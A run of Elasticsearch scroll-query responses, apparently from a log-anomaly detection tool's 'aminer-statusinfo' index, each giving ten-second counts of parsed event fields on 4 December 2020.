{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"oDPxLXYBIkOurnXXTYjD","_score":1.0,"_source":{"FromTime":1.607088547363252E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":2612,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:17.404Z","ToTime":1.60708855736333E9,"fromtimestamp":"2020-12-04T13:29:07.363Z","totimestamp":"2020-12-04T13:29:17.363Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"pTPxLXYBIkOurnXXdYjw","_score":1.0,"_source":{"FromTime":1.607088557644684E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1351,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:27.689Z","ToTime":1.607088567644748E9,"fromtimestamp":"2020-12-04T13:29:17.644Z","totimestamp":"2020-12-04T13:29:27.644Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qjPxLXYBIkOurnXXnYh6","_score":1.0,"_source":{"FromTime":1.607088567768974E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":450,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:37.811Z","ToTime":1.607088577769054E9,"fromtimestamp":"2020-12-04T13:29:27.768Z","totimestamp":"2020-12-04T13:29:37.769Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPxLXYBIkOurnXXxog0","_score":1.0,"_source":{"FromTime":1.607088578197576E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":1876,"/parser/model/php":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:48.237Z","ToTime":1.607088588197668E9,"fromtimestamp":"2020-12-04T13:29:38.197Z","totimestamp":"2020-12-04T13:29:48.197Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPxLXYBIkOurnXX7Yjs","_score":1.0,"_source":{"FromTime":1.607088588366563E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":750,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:58.405Z","ToTime":1.607088598366688E9,"fromtimestamp":"2020-12-04T13:29:48.366Z","totimestamp":"2020-12-04T13:29:58.366Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uTPyLXYBIkOurnXXFogk","_score":1.0,"_source":{"FromTime":1.607088598649987E9,"StatusInfo":{"/parser/model/classification":1,"/parser/model/event_type_str":18,"/parser/model/type_str":1400,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:08.701Z","ToTime":1.607088608650065E9,"fromtimestamp":"2020-12-04T13:29:58.649Z","totimestamp":"2020-12-04T13:30:08.650Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPyLXYBIkOurnXXPoh2","_score":1.0,"_source":{"FromTime":1.607088608978295E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":87,"/parser/model/type_str":7140,"/parser/model/php":0,"/parser/model/status_code":36,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:19.023Z","ToTime":1.60708861897837E9,"fromtimestamp":"2020-12-04T13:30:08.978Z","totimestamp":"2020-12-04T13:30:18.978Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wzPyLXYBIkOurnXXZohS","_score":1.0,"_source":{"FromTime":1.607088619188115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":948,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:29.226Z","ToTime":1.607088629188182E9,"fromtimestamp":"2020-12-04T13:30:19.188Z","totimestamp":"2020-12-04T13:30:29.188Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPyLXYBIkOurnXXj4j4","_score":1.0,"_source":{"FromTime":1.607088629851852E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":33,"/parser/model/type_str":3427,"/parser/model/php":0,"/parser/model/status_code":7,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:39.889Z","ToTime":1.607088639851962E9,"fromtimestamp":"2020-12-04T13:30:29.851Z","totimestamp":"2020-12-04T13:30:39.851Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"zDPyLXYBIkOurnXXuIjH","_score":1.0,"_source":{"FromTime":1.607088640299281E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":2606,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:50.336Z","ToTime":1.607088650299357E9,"fromtimestamp":"2020-12-04T13:30:40.299Z","totimestamp":"2020-12-04T13:30:50.299Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"0TPyLXYBIkOurnXX4Iip","_score":1.0,"_source":{"FromTime":1.607088650508702E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1037,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:00.546Z","ToTime":1.607088660508778E9,"fromtimestamp":"2020-12-04T13:30:50.508Z","totimestamp":"2020-12-04T13:31:00.508Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"1zPzLXYBIkOurnXXCIiC","_score":1.0,"_source":{"FromTime":1.607088660705171E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":918,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:10.746Z","ToTime":1.607088670705239E9,"fromtimestamp":"2020-12-04T13:31:00.705Z","totimestamp":"2020-12-04T13:31:10.705Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"2zPzLXYBIkOurnXXMIjN","_score":1.0,"_source":{"FromTime":1.607088671024308E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1723,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:21.062Z","ToTime":1.607088681024395E9,"fromtimestamp":"2020-12-04T13:31:11.024Z","totimestamp":"2020-12-04T13:31:21.024Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4TPzLXYBIkOurnXXWYgr","_score":1.0,"_source":{"FromTime":1.607088681354751E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1715,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:31.396Z","ToTime":1.607088691354804E9,"fromtimestamp":"2020-12-04T13:31:21.354Z","totimestamp":"2020-12-04T13:31:31.354Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"5TPzLXYBIkOurnXXgoi1","_score":1.0,"_source":{"FromTime":1.607088691965782E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":3070,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:42.030Z","ToTime":1.60708870196585E9,"fromtimestamp":"2020-12-04T13:31:31.965Z","totimestamp":"2020-12-04T13:31:41.965Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6zPzLXYBIkOurnXXq4gV","_score":1.0,"_source":{"FromTime":1.607088702327717E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1887,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:52.365Z","ToTime":1.607088712327798E9,"fromtimestamp":"2020-12-04T13:31:42.327Z","totimestamp":"2020-12-04T13:31:52.327Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7zPzLXYBIkOurnXX0oiK","_score":1.0,"_source":{"FromTime":1.607088712407204E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":323,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:02.467Z","ToTime":1.607088722407292E9,"fromtimestamp":"2020-12-04T13:31:52.407Z","totimestamp":"2020-12-04T13:32:02.407Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPzLXYBIkOurnXX-ogA","_score":1.0,"_source":{"FromTime":1.607088722502143E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":318,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:12.569Z","ToTime":1.607088732502287E9,"fromtimestamp":"2020-12-04T13:32:02.502Z","totimestamp":"2020-12-04T13:32:12.502Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DP0LXYBIkOurnXXF4gX","_score":1.0,"_source":{"FromTime":1.607088729964115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":3,"/parser/model/type_str":2343,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:20.017Z","ToTime":1.607088739964161E9,"fromtimestamp":"2020-12-04T13:32:09.964Z","totimestamp":"2020-12-04T13:32:19.964Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TP0LXYBIkOurnXXQYjJ","_score":1.0,"_source":{"FromTime":1.607088740904546E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":4933,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:30.946Z","ToTime":1.607088750904612E9,"fromtimestamp":"2020-12-04T13:32:20.904Z","totimestamp":"2020-12-04T13:32:30.904Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_zP0LXYBIkOurnXXSYi3","_score":1.0,"_source":{"FromTime":1.607088742920283E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:32.977Z","ToTime":1.607088752920326E9,"fromtimestamp":"2020-12-04T13:32:22.920Z","totimestamp":"2020-12-04T13:32:32.920Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"AzP0LXYBIkOurnXXcYlB","_score":1.0,"_source":{"FromTime":1.60708875305248E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":517,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:43.098Z","ToTime":1.607088763052544E9,"fromtimestamp":"2020-12-04T13:32:33.052Z","totimestamp":"2020-12-04T13:32:43.052Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CTP0LXYBIkOurnXXmYl8","_score":1.0,"_source":{"FromTime":1.607088763350645E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":1221,"/parser/model/php":0,"/parser/model/status_code":17,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:53.397Z","ToTime":1.607088773350717E9,"fromtimestamp":"2020-12-04T13:32:43.350Z","totimestamp":"2020-12-04T13:32:53.350Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DTP0LXYBIkOurnXXwIn-","_score":1.0,"_source":{"FromTime":1.607088773468664E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":461,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:03.511Z","ToTime":1.607088783468755E9,"fromtimestamp":"2020-12-04T13:32:53.468Z","totimestamp":"2020-12-04T13:33:03.468Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EjP0LXYBIkOurnXX6ok5","_score":1.0,"_source":{"FromTime":1.607088784026072E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":2426,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:14.066Z","ToTime":1.607088794026145E9,"fromtimestamp":"2020-12-04T13:33:04.026Z","totimestamp":"2020-12-04T13:33:14.026Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GDP1LXYBIkOurnXXEYmz","_score":1.0,"_source":{"FromTime":1.607088794130318E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":401,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:24.172Z","ToTime":1.60708880413046E9,"fromtimestamp":"2020-12-04T13:33:14.130Z","totimestamp":"2020-12-04T13:33:24.130Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HDP1LXYBIkOurnXXOYks","_score":1.0,"_source":{"FromTime":1.607088804238838E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":419,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:34.277Z","ToTime":1.607088814238905E9,"fromtimestamp":"2020-12-04T13:33:24.238Z","totimestamp":"2020-12-04T13:33:34.238Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ITP1LXYBIkOurnXXYIlW","_score":1.0,"_source":{"FromTime":1.607088814261893E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:44.303Z","ToTime":1.607088824261959E9,"fromtimestamp":"2020-12-04T13:33:34.261Z","totimestamp":"2020-12-04T13:33:44.261Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JjP1LXYBIkOurnXXh4l_","_score":1.0,"_source":{"FromTime":1.607088824290643E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":5347,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:54.328Z","ToTime":1.607088834290724E9,"fromtimestamp":"2020-12-04T13:33:44.290Z","totimestamp":"2020-12-04T13:33:54.290Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KzP1LXYBIkOurnXXsImn","_score":1.0,"_source":{"FromTime":1.607088834826981E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":46,"/parser/model/type_str":2788,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:04.864Z","ToTime":1.60708884482705E9,"fromtimestamp":"2020-12-04T13:33:54.826Z","totimestamp":"2020-12-04T13:34:04.827Z","version":"1"}}]}} 